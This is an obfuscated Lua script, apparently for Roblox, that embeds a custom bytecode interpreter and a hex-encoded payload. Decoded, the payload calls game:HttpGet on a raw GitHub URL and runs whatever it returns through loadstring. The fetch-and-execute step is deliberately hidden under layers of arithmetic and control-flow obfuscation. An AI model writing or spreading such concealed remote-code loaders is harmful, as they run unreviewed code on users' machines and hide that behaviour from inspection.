print("https://github.com/StrixMacine/12-e098duan")



local v0 = tonumber;
local v1 = string.byte;
local v2 = string.char;
local v3 = string.sub;
local v4 = string.gsub;
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math.ldexp;
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table.unpack;
local v14 = tonumber;
local function v15(v16, v17, ...)
	local v18 = 1;
	local v19;
	v16 = v4(v3(v16, 5), "..", function(v30)
		if (v1(v30, 2) == 81) then
			local v86 = 0;
			while true do
				if (v86 == 0) then
					v19 = v0(v3(v30, 1, 1));
					return "";
				end
			end
		else
			local v87 = v2(v0(v30, 16));
			if v19 then
				local v116 = v5(v87, v19);
				v19 = nil;
				return v116;
			else
				return v87;
			end
		end
	end);
	local function v20(v31, v32, v33)
		if v33 then
			local v88 = (v31 / (((882 - (282 + 595)) - 3) ^ (v32 - ((1639 - (1523 + 114)) - 1)))) % ((3 - 1) ^ (((v33 - 1) - (v32 - (2 - 1))) + (620 - (555 + 64))));
			return v88 - (v88 % (932 - (857 + 74)));
		else
			local v89 = (570 - (367 + 201)) ^ (v32 - (928 - (214 + 713)));
			return (((v31 % (v89 + v89)) >= v89) and (1 + 0 + 0)) or (0 + 0);
		end
	end
	local function v21()
		local v34 = v1(v16, v18, v18);
		v18 = v18 + 1;
		return v34;
	end
	local function v22()
		local v35 = 117 - (32 + 85);
		local v36;
		local v37;
		while true do
			if (v35 == (1 + 0)) then
				return (v37 * (364 - 108)) + v36;
			end
			if (v35 == (1065 - (68 + 997))) then
				v36, v37 = v1(v16, v18, v18 + ((2350 - 1078) - (226 + 1044)));
				v18 = v18 + 2;
				v35 = (7 - 3) - 3;
			end
		end
	end
	local function v23()
		local v38, v39, v40, v41 = v1(v16, v18, v18 + ((1402 - 1049) - (87 + 263)));
		v18 = v18 + (184 - (67 + 113));
		return (v41 * (12302277 + 4474939)) + (v40 * (160901 - 95365)) + (v39 * (189 + 67)) + v38;
	end
	local function v24()
		local v42 = 952 - (802 + 150);
		local v43;
		local v44;
		local v45;
		local v46;
		local v47;
		local v48;
		while true do
			if (v42 == (1 - (0 - 0))) then
				v45 = 2 - 1;
				v46 = (v20(v44, 1 - 0, 15 + 5) * ((999 - (915 + 82)) ^ 32)) + v43;
				v42 = 5 - 3;
			end
			if (v42 == (1 + 2)) then
				if (v47 == (0 + 0)) then
					if (v46 == (0 - 0)) then
						return v48 * (1187 - (1069 + 118));
					else
						v47 = 1;
						v45 = 0 - 0;
					end
				elseif (v47 == (1202 + 845)) then
					return ((v46 == 0) and (v48 * (1 / (0 - (0 - 0))))) or (v48 * NaN);
				end
				return v8(v48, v47 - (71 + 107 + (2909 - 2064))) * (v45 + (v46 / ((3 - 1) ^ ((1931 - (760 + 987)) - 132))));
			end
			if (v42 == (0 + 0)) then
				v43 = v23();
				v44 = v23();
				v42 = 792 - (368 + 423);
			end
			if (v42 == (1915 - (1789 + 124))) then
				v47 = v20(v44, 65 - 44, 49 - (10 + 8));
				v48 = ((v20(v44, 798 - (745 + 21)) == (3 - 2)) and -(443 - (144 + 272 + 26))) or (3 - (5 - 3));
				v42 = 2 + 1;
			end
		end
	end
	local function v25(v49)
		local v50 = 0;
		local v51;
		local v52;
		while true do
			if (v50 == (7 - 5)) then
				v52 = {};
				for v117 = 1 + (0 - 0), #v51 do
					v52[v117] = v2(v1(v3(v51, v117, v117)));
				end
				v50 = 1 + 2 + 0;
			end
			if (v50 == (1055 - (87 + (2131 - 1163)))) then
				v51 = nil;
				if not v49 then
					local v123 = (14 - (9 + 5)) - 0;
					while true do
						if (((376 - (85 + 291)) + 0) == v123) then
							v49 = v23();
							if (v49 == (0 - 0)) then
								return "";
							end
							break;
						end
					end
				end
				v50 = 1414 - (447 + 966);
			end
			if (v50 == (2 - 1)) then
				v51 = v3(v16, v18, (v18 + v49) - (1818 - (1703 + 114)));
				v18 = v18 + v49;
				v50 = 703 - (376 + 325);
			end
			if (v50 == (4 - 1)) then
				return v6(v52);
			end
		end
	end
	local v26 = v23;
	local function v27(...)
		return {...}, v12("#", ...);
	end
	local function v28()
		local v53 = (function()
			return function(v90, v91, v92, v93, v94, v95, v96, v97)
				local v90 = (function()
					return 0;
				end)();
				local v91 = (function()
					return;
				end)();
				local v92 = (function()
					return;
				end)();
				while true do
					if (v90 ~= #"/") then
					else
						if (v91 == #"\\") then
							v92 = (function()
								return v93() ~= (290 - (60 + 230));
							end)();
						elseif (v91 == 2) then
							v92 = (function()
								return v94();
							end)();
						elseif (v91 ~= #"gha") then
						else
							v92 = (function()
								return v95();
							end)();
						end
						v96[v97] = (function()
							return v92;
						end)();
						break;
					end
					if ((0 + 0) ~= v90) then
					else
						local v125 = (function()
							return 0;
						end)();
						while true do
							if (v125 == 0) then
								v91 = (function()
									return v93();
								end)();
								v92 = (function()
									return nil;
								end)();
								v125 = (function()
									return 1 + 0;
								end)();
							end
							if (v125 == (122 - (17 + 104))) then
								v90 = (function()
									return #"]";
								end)();
								break;
							end
						end
					end
				end
				return v90, v91, v92, v93, v94, v95, v96, v97;
			end;
		end)();
		local v54 = (function()
			return function(v98, v99, v100, v101, v102, v103, v104, v105, v106)
				local v107 = (function()
					return 572 - (426 + 146);
				end)();
				local v98 = (function()
					return;
				end)();
				local v99 = (function()
					return;
				end)();
				while true do
					local v115 = (function()
						return 0 + 0;
					end)();
					while true do
						if (v115 ~= (0 - 0)) then
						else
							if (v107 ~= (1 + 0)) then
							else
								while true do
									if (v98 ~= (811 - (569 + 242))) then
									else
										v99 = (function()
											return v100();
										end)();
										if (v101(v99, #"|", #".") ~= (0 + 0)) then
										else
											local v168 = (function()
												return 0;
											end)();
											local v169 = (function()
												return;
											end)();
											local v170 = (function()
												return;
											end)();
											local v171 = (function()
												return;
											end)();
											while true do
												if ((3 - 1) == v168) then
													if (v101(v170, #"|", #"\\") ~= #"[") then
													else
														v171[2 - 0] = (function()
															return v104[v171[1026 - (706 + 318)]];
														end)();
													end
													if (v101(v170, 1253 - (721 + 530), 1273 - (945 + 326)) == #"]") then
														v171[#"-19"] = (function()
															return v104[v171[#"xxx"]];
														end)();
													end
													v168 = (function()
														return 7 - 4;
													end)();
												end
												if ((3 + 0) ~= v168) then
												else
													if (v101(v170, #"xnx", #"-19") ~= #"]") then
													else
														v171[#"asd1"] = (function()
															return v104[v171[#"http"]];
														end)();
													end
													v105[v106] = (function()
														return v171;
													end)();
													break;
												end
												if (v168 ~= 0) then
												else
													local v186 = (function()
														return 0 + 0;
													end)();
													while true do
														if (v186 == (1637 - (1373 + 263))) then
															v168 = (function()
																return 1;
															end)();
															break;
														end
														if (v186 == (1500 - (1408 + 92))) then
															v169 = (function()
																return v101(v99, 1002 - (451 + 549), #"91(");
															end)();
															v170 = (function()
																return v101(v99, #"xnxx", 6);
															end)();
															v186 = (function()
																return 1;
															end)();
														end
													end
												end
												if (v168 == 1) then
													v171 = (function()
														return {v102(),v102(),nil,nil};
													end)();
													if (v169 == (0 + 0)) then
														local v190 = (function()
															return 0 - 0;
														end)();
														local v191 = (function()
															return;
														end)();
														while true do
															if (v190 == (0 - 0)) then
																v191 = (function()
																	return 1384 - (746 + 638);
																end)();
																while true do
																	if (v191 == (0 + 0)) then
																		v171[#"-19"] = (function()
																			return v102();
																		end)();
																		v171[#"?id="] = (function()
																			return v102();
																		end)();
																		break;
																	end
																end
																break;
															end
														end
													elseif (v169 == #".") then
														v171[#"gha"] = (function()
															return v103();
														end)();
													elseif (v169 == (2 - 0)) then
														v171[#"nil"] = (function()
															return v103() - ((343 - (218 + 123)) ^ 16);
														end)();
													elseif (v169 == #"91(") then
														local v196 = (function()
															return 0 + 0;
														end)();
														local v197 = (function()
															return;
														end)();
														while true do
															if (v196 ~= (1581 - (1535 + 46))) then
															else
																v197 = (function()
																	return 0;
																end)();
																while true do
																	if (v197 ~= (1171 - (418 + 753))) then
																	else
																		v171[#"nil"] = (function()
																			return v103() - ((1 + 1) ^ (16 + 0));
																		end)();
																		v171[#"0313"] = (function()
																			return v102();
																		end)();
																		break;
																	end
																end
																break;
															end
														end
													end
													v168 = (function()
														return 1 + 1;
													end)();
												end
											end
										end
										break;
									end
								end
								return v98, v99, v100, v101, v102, v103, v104, v105, v106;
							end
							if (v107 == (560 - (306 + 254))) then
								local v128 = (function()
									return 0 + 0;
								end)();
								local v129 = (function()
									return;
								end)();
								while true do
									if ((0 + 0) ~= v128) then
									else
										v129 = (function()
											return 529 - (406 + 123);
										end)();
										while true do
											if ((1 - 0) ~= v129) then
											else
												v107 = (function()
													return 1468 - (899 + 568);
												end)();
												break;
											end
											if (v129 ~= 0) then
											else
												v98 = (function()
													return 1769 - (1749 + 20);
												end)();
												v99 = (function()
													return nil;
												end)();
												v129 = (function()
													return 1 + 0;
												end)();
											end
										end
										break;
									end
								end
							end
							break;
						end
					end
				end
			end;
		end)();
		local v55 = (function()
			return function(v108, v109, v110)
				local v111 = (function()
					return 0;
				end)();
				local v112 = (function()
					return;
				end)();
				while true do
					if (v111 == (0 + 0)) then
						v112 = (function()
							return 0;
						end)();
						while true do
							if (v112 == (0 - 0)) then
								local v130 = (function()
									return 0 + 0;
								end)();
								while true do
									if (v130 == (603 - (268 + 335))) then
										v108[v109 - #" "] = (function()
											return v110();
										end)();
										return v108, v109, v110;
									end
								end
							end
						end
						break;
					end
				end
			end;
		end)();
		local v56 = (function()
			return {};
		end)();
		local v57 = (function()
			return {};
		end)();
		local v58 = (function()
			return {};
		end)();
		local v59 = (function()
			return {v56,v57,nil,v58};
		end)();
		local v60 = (function()
			return v23();
		end)();
		local v61 = (function()
			return {};
		end)();
		for v69 = #"<", v60 do
			FlatIdent_E652, Type, Cons, v21, v24, v25, v61, v69 = (function()
				return v53(FlatIdent_E652, Type, Cons, v21, v24, v25, v61, v69);
			end)();
		end
		v59[#"nil"] = (function()
			return v21();
		end)();
		for v70 = #"<", v23() do
			FlatIdent_6053C, Descriptor, v21, v20, v22, v23, v61, v56, v70 = (function()
				return v54(FlatIdent_6053C, Descriptor, v21, v20, v22, v23, v61, v56, v70);
			end)();
		end
		for v71 = #"/", v23() do
			v57, v71, v28 = (function()
				return v55(v57, v71, v28);
			end)();
		end
		return v59;
	end
	local function v29(v63, v64, v65)
		local v66 = v63[2 - 1];
		local v67 = v63[1902 - (106 + 1794)];
		local v68 = v63[1 + 2];
		return function(...)
			local v72 = v66;
			local v73 = v67;
			local v74 = v68;
			local v75 = v27;
			local v76 = 1;
			local v77 = -1;
			local v78 = {};
			local v79 = {...};
			local v80 = v12("#", ...) - 1;
			local v81 = {};
			local v82 = {};
			for v113 = 0 - 0, v80 do
				if (v113 >= v74) then
					v78[v113 - v74] = v79[v113 + (4 - 3)];
				else
					v82[v113] = v79[v113 + (2 - 1)];
				end
			end
			local v83 = (v80 - v74) + (115 - (4 + 110));
			local v84;
			local v85;
			while true do
				local v114 = 584 - (57 + 527);
				while true do
					if (v114 == (1428 - ((794 - (239 + 514)) + 1386))) then
						if (v85 <= (106 - (17 + 86))) then
							if ((v85 <= (1 + 0)) or (3755 <= 915)) then
								if (v85 == (0 + 0)) then
									local v132;
									local v133, v134;
									local v135;
									local v136;
									v82[v84[3 - 1]] = {};
									v76 = v76 + (2 - 1);
									v84 = v72[v76];
									v82[v84[168 - (122 + 44)]] = v65[v84[5 - 2]];
									v76 = v76 + ((1332 - (797 + 532)) - (2 + 0));
									v84 = v72[v76];
									v82[v84[2 + 0]] = v65[v84[1 + 2]];
									v76 = v76 + (1 - 0);
									v84 = v72[v76];
									v136 = v84[67 - (30 + 35)];
									v135 = v82[v84[3 + 0]];
									v82[v136 + 1] = v135;
									v82[v136] = v135[v84[4]];
									v76 = v76 + (1258 - (1043 + 214));
									v84 = v72[v76];
									v82[v84[7 - (2 + 3)]] = v84[3];
									v76 = v76 + (1213 - (323 + 889));
									v84 = v72[v76];
									v136 = v84[5 - 3];
									v133, v134 = v75(v82[v136](v13(v82, v136 + 1, v84[3])));
									v77 = (v134 + v136) - (581 - (361 + 219));
									v132 = 0;
									for v165 = v136, v77 do
										v132 = v132 + (321 - (53 + (627 - 360)));
										v82[v165] = v133[v132];
									end
									v76 = v76 + 1 + 0;
									v84 = v72[v76];
									v136 = v84[415 - (15 + (1600 - (373 + 829)))];
									v82[v136] = v82[v136](v13(v82, v136 + ((1714 - (476 + 255)) - (18 + 964)), v77));
									v76 = v76 + (3 - 2);
									v84 = v72[v76];
									v82[v84[2 + 0]]();
									v76 = v76 + 1 + 0;
									v84 = v72[v76];
									do
										return;
									end
								else
									v82[v84[852 - (20 + 830)]] = {};
								end
							elseif (v85 == (2 + 0)) then
								local v153 = 0;
								local v154;
								local v155;
								local v156;
								local v157;
								while true do
									if (v153 == (126 - (116 + 10))) then
										v154 = v84[1 + (1131 - (369 + 761))];
										v155, v156 = v75(v82[v154](v13(v82, v154 + 1, v84[741 - (542 + 114 + 82)])));
										v153 = 1 - 0;
									end
									if (v153 == ((1 - 0) + 1)) then
										for v182 = v154, v77 do
											v157 = v157 + 1 + 0;
											v82[v182] = v155[v157];
										end
										break;
									end
									if ((3946 > 3743) and (v153 == ((1 - 0) + (238 - (64 + 174))))) then
										v77 = (v156 + v154) - 1;
										v157 = 0 - 0;
										v153 = (1 + 3) - 2;
									end
								end
							else
								local v158 = (2296 - 745) - (1126 + 425);
								local v159;
								local v160;
								while true do
									if (v158 == 0) then
										v159 = v84[2];
										v160 = v82[v84[408 - ((454 - (144 + 192)) + 287)]];
										v158 = 3 - 2;
									end
									if (((1338 - (42 + 174)) - (118 + 1003)) == v158) then
										v82[v159 + ((2 + 0) - 1)] = v160;
										v82[v159] = v160[v84[381 - (142 + 235)]];
										break;
									end
								end
							end
						elseif (v85 <= 5) then
							if ((v85 > (18 - 14)) or (1335 >= 3306)) then
								v82[v84[1 + 1]]();
							else
								local v161 = 977 - (553 + 424);
								local v162;
								while true do
									if ((4844 > 2253) and (v161 == (0 - 0))) then
										v162 = v84[2 + 0];
										v82[v162] = v82[v162](v13(v82, v162 + 1 + 0 + 0, v77));
										break;
									end
								end
							end
						elseif (v85 <= 6) then
							v82[v84[2]] = v65[v84[2 + 1]];
						elseif (v85 > (3 + 4)) then
							do
								return;
							end
						else
							v82[v84[2 + 0]] = v84[3];
						end
						v76 = v76 + (2 - 1);
						break;
					end
					if ((452 == 452) and (v114 == (0 - 0))) then
						v84 = v72[v76];
						v85 = v84[2 - 1];
						v114 = 1 + 0;
					end
				end
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403703Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53747269784D6163696E652F31322D653039386475616E736F6437766A6B2D7033326A6D6F61732F726566732F68656164732F6D61737465722F3033393237364453465349574A4446563139323300099Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00", v9(), ...);
